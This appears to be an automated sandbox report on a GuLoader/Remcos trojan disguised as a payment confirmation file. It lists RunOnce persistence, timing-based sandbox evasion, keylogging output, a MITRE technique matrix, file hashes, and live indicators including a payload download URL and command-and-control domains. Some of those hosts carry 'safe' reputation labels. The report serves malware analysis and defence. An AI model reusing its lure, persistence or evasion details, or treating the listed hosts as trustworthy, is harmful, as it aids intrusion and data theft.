              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeCode function: 0_2_6E3130C0 push eax; ret 0_2_6E3130EE
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeFile created: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.batJump to dropped file
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsa1392.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeFile created: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.batJump to dropped file
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce UnvanquishedJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce UnvanquishedJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce UnvanquishedJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce UnvanquishedJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeFile opened: \Device\RasAcd count: 64074Jump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeAPI/Special instruction interceptor: Address: 744EFF8
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeAPI/Special instruction interceptor: Address: 5A4EFF8
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeRDTSC instruction interceptor: First address: 741446B second address: 741446B instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 30F9070Dh 0x00000008 cmp ebx, ecx 0x0000000a jc 00007FA504F246E2h 0x0000000c test ebx, edx 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeRDTSC instruction interceptor: First address: 5A1446B second address: 5A1446B instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 30F9070Dh 0x00000008 cmp ebx, ecx 0x0000000a jc 00007FA504C3EDB2h 0x0000000c test ebx, edx 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeWindow / User API: threadDelayed 3403Jump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeWindow / User API: threadDelayed 605Jump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeWindow / User API: threadDelayed 3334Jump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeWindow / User API: foregroundWindowGot 1696Jump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsa1392.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe TID: 5616Thread sleep count: 3403 > 30Jump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe TID: 6024Thread sleep count: 605 > 30Jump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe TID: 6024Thread sleep time: -1815000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe TID: 2508Thread sleep count: 95 > 30Jump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe TID: 2508Thread sleep time: -95000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe TID: 6024Thread sleep count: 3334 > 30Jump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe TID: 6024Thread sleep time: -10002000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe TID: 2508Thread sleep count: 31 > 30Jump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe TID: 2508Thread sleep time: -31000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeThread sleep count: Count: 3403 delay: -5Jump to behavior
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeCode function: 0_2_004069DF FindFirstFileW,FindClose,0_2_004069DF
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeCode function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D8E
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.00000000069D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.0000000006A39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4395
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4400
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeCode function: 0_2_6E311BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_6E311BFF
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeProcess created: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"Jump to behavior
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.0000000006A4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.0000000006A4C000.00000004.00000020.00020000.00000000.sdmp, inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.00000000069D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerIG\
              Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.00000000069D8000.00000004.00000020.00020000.00000000.sdmp, logs.dat.4.drBinary or memory string: [Program Manager]
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000004.00000002.4630508505.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4609214805.0000000006A16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4609214805.0000000006A4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe PID: 5888, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Remote Access Functionality

              barindex
              Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-0B1XIGJump to behavior
              Source: Yara matchFile source: 00000004.00000002.4630508505.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4609214805.0000000006A16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4609214805.0000000006A4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe PID: 5888, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Native API
              1
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              11
              Masquerading
              11
              Input Capture
              31
              Security Software Discovery
              Remote Services11
              Input Capture
              11
              Encrypted Channel
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading
              12
              Process Injection
              12
              Virtualization/Sandbox Evasion
              LSASS Memory12
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol1
              Archive Collected Data
              1
              Remote Access Software
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin Shares1
              Clipboard Data
              1
              Ingress Tool Transfer
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              DLL Side-Loading
              12
              Process Injection
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information
              LSA Secrets3
              File and Directory Discovery
              SSHKeylogging113
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials23
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe35%VirustotalBrowse
              inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe26%ReversingLabs
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat26%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nsa1392.tmp\System.dll0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://teldrum.ro/NJrdZqNcCtz102.bin;0%Avira URL Cloudsafe
              https://teldrum.ro/NJrdZqNcCtz102.bin0%Avira URL Cloudsafe
              https://teldrum.ro/0%Avira URL Cloudsafe
              linktreewealthy.zapto.org0%Avira URL Cloudsafe
              linktreewealth.zapto.org0%Avira URL Cloudsafe
              https://teldrum.ro/NJrdZqNcCtz102.bin70%Avira URL Cloudsafe
              https://teldrum.ro/NJrdZqNcCtz102.binOpklsLedcrestereamuschilor.ro/NJrdZqNcCtz102.bin0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              linktreewealth.zapto.org
              0.0.0.0
              truetrue
                unknown
                teldrum.ro
                109.99.162.14
                truefalse
                  unknown
                  linktreewealthy.zapto.org
                  unknown
                  unknowntrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    linktreewealth.zapto.orgtrue
                    • Avira URL Cloud: safe
                    unknown
                    linktreewealthy.zapto.orgtrue
                    • Avira URL Cloud: safe
                    unknown
                    https://teldrum.ro/NJrdZqNcCtz102.binfalse
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdinward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                      high
                      http://www.ftp.ftp://ftp.gopher.inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                        high
                        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdinward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                          high
                          https://teldrum.ro/NJrdZqNcCtz102.bin;inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.00000000069D8000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://nsis.sf.net/NSIS_ErrorErrorinward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, Rockerfest.bat.4.drfalse
                            high
                            https://teldrum.ro/NJrdZqNcCtz102.bin7inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.0000000006A16000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://teldrum.ro/inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.00000000069D8000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                              high
                              https://teldrum.ro/NJrdZqNcCtz102.binOpklsLedcrestereamuschilor.ro/NJrdZqNcCtz102.bininward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4629681766.0000000035F30000.00000004.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              109.99.162.14
                              teldrum.roRomania
                              9050RTDBucharestRomaniaROfalse
                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1590830
                              Start date and time:2025-01-14 16:31:56 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 9m 9s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:5
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@3/10@20/1
                              EGA Information:
                              • Successful, ratio: 50%
                              HCA Information:
                              • Successful, ratio: 85%
                              • Number of executed functions: 47
                              • Number of non-executed functions: 34
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Override analysis time to 240s for sample files taking high CPU consumption
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              TimeTypeDescription
                              10:36:07API Interceptor199351x Sleep call for process: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe modified
                              16:35:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Unvanquished C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat
                              16:35:35AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Unvanquished C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              109.99.162.142T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                  z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                    DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                      DHL_119040 receipt document,pdf.exeGet hashmaliciousAgentTeslaBrowse
                                        SecuriteInfo.com.W32.MSIL_Kryptik.HRZ.genEldorado.12789.exeGet hashmaliciousAgentTeslaBrowse
                                          SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeGet hashmaliciousAgentTeslaBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            linktreewealth.zapto.org2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 43.226.229.209
                                            teldrum.ro2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 109.99.162.14
                                            DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                            • 109.99.162.14
                                            z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 109.99.162.14
                                            DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 109.99.162.14
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            RTDBucharestRomaniaROppc.elfGet hashmaliciousUnknownBrowse
                                            • 80.97.224.140
                                            arm7.elfGet hashmaliciousMiraiBrowse
                                            • 109.102.20.98
                                            2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 109.99.162.14
                                            4.elfGet hashmaliciousUnknownBrowse
                                            • 193.231.241.68
                                            Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                                            • 92.83.30.89
                                            3.elfGet hashmaliciousUnknownBrowse
                                            • 109.99.173.54
                                            DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcosBrowse
                                            • 109.99.162.14
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            37f463bf4616ecd445d4a1937da06e191KaTo6P18Z.docGet hashmaliciousUnknownBrowse
                                            • 109.99.162.14
                                            5UnAIdF7m2.docxGet hashmaliciousUnknownBrowse
                                            • 109.99.162.14
                                            2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                            • 109.99.162.14
                                            183643586-388657435.07.exeGet hashmaliciousUnknownBrowse
                                            • 109.99.162.14
                                            Handler.exeGet hashmaliciousDanaBot, VidarBrowse
                                            • 109.99.162.14
                                            sysadmin.exeGet hashmaliciousVidarBrowse
                                            • 109.99.162.14
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\AppData\Local\Temp\nsa1392.tmp\System.dll2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                              2T10XBqS6g.exeGet hashmaliciousGuLoaderBrowse
                                                2T10XBqS6g.exeGet hashmaliciousGuLoaderBrowse
                                                  2T10XBqS6g.exeGet hashmaliciousGuLoaderBrowse
                                                    ZAMOWIEN.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      https://github.com/Ultimaker/Cura/releases/download/5.9.0/UltiMaker-Cura-5.9.0-win64-X64.exeGet hashmaliciousUnknownBrowse
                                                        RFQ_BDS636011.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                          Process:C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):162
                                                          Entropy (8bit):3.3898151468438855
                                                          Encrypted:false
                                                          SSDEEP:3:rglsKlENzlNWlwfU5JWRal2Jl+7R0DAlBG4moojklovDl6v:Mls5Nz+x5YcIeeDAlS1gWAv
                                                          MD5:600D3381E61A54CF5C53093AC19FF10C
                                                          SHA1:3735B172E4B504751811F942BE362E6D961A7443
                                                          SHA-256:98929F38F05FBCB77BD78442EEF50C0BAC29B26D07C2C5F3C7C2B15E3D0273FF
                                                          SHA-512:2642DDF0A078D3D27134C4C5622D45FCD2A9C7FD9D1A7A35DC1C7DFE472AFEB6A4033265363AF689A248D021E06849C0B84AAEE11D53DF135F2137C04A87ACD6
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                          Reputation:low
                                                          Preview:....[.2.0.2.5./.0.1./.1.4. .1.0.:.3.5.:.3.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                          Process:C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):25
                                                          Entropy (8bit):4.0536606896881855
                                                          Encrypted:false
                                                          SSDEEP:3:8+dB4WYiTNvn:8AbYiTNvn
                                                          MD5:08CA75DA54EB4810D18796C97F510A55
                                                          SHA1:3D9B020193D16E7D0F5392EF7693A6C5C6D2531D
                                                          SHA-256:E628D2EE9FE054256B42FFDEC449254437949DEB45B13354D515579CE3E0618E
                                                          SHA-512:46D71D69FDCBF9069E74C1176080637A1356E747FA1A1C852172CF0BB36F44ED7D741EB6DF029F333D690E500462DFC9EDEB8B4EB7BB9642C907B792F30DED9A
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:[Bus Clock]..Gats=Galse..
                                                          Process:C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Category:dropped
                                                          Size (bytes):550217
                                                          Entropy (8bit):7.712228071105721
                                                          Encrypted:false
                                                          SSDEEP:6144:UnPdudwDCVOCg2G4A+uxXCpzna3MSzy99s5sbro5kd+B4hJ1QQsSGuhkrpzOUlec:UnPdMg2H8SpzaThHy7mzOUlvnVMs3e+
                                                          MD5:25EEC63EDF7C0EB8628A89712B5CB363
                                                          SHA1:4E8D586A950492C30147B7D56BCFAD49CD577966
                                                          SHA-256:E075807417590255DE4D395FA3DFBC336E88C96BBAB8AFCA1D5E5D5ABBAC0237
                                                          SHA-512:086FEB119E2A02F2FD7AFC45C422F9B472F049EB2E79F83769F25254D88A84086275D2CFF1E891D360EA57978292CD0CAF958E4000CD659AC532165E1F881DFB
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 26%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...g.d.................h..."......E6............@..........................0............@.............................................X............................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x...........................@....ndata...................................rsrc...X...........................@..@................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1091527
                                                          Entropy (8bit):3.7883797592579986
                                                          Encrypted:false
                                                          SSDEEP:12288:qvZYo2Z5DAmaghhFm2YqtP4lIxgBVLpadBoS9CR:8YdJagOWP4EeVLeOF
                                                          MD5:714AB9E19CCDB0A431DB45B3EFD1D462
                                                          SHA1:C61D1E403FDF00B6FC47481D1C56BE7368A496E7
                                                          SHA-256:2B9B7C3E4EA530F8AE338734ED61B365F0A124687EE88BEAE57E07259B0DCE66
                                                          SHA-512:A6E108B4787A8EA44BC6187960FBEC6B5C7954ED6695060C4BE8A88B579928CA31E4E30501374F9F896DEF92438EE1A04C2DBDA6CD4255E24587DE4741595F0B
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:........,...................X...d.......d...................................................................................................................................................................................................................................................G...Y...........q...j...............................................................................................................................b.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):12288
                                                          Entropy (8bit):5.805604762622714
                                                          Encrypted:false
                                                          SSDEEP:192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
                                                          MD5:4ADD245D4BA34B04F213409BFE504C07
                                                          SHA1:EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
                                                          SHA-256:9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
                                                          SHA-512:1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
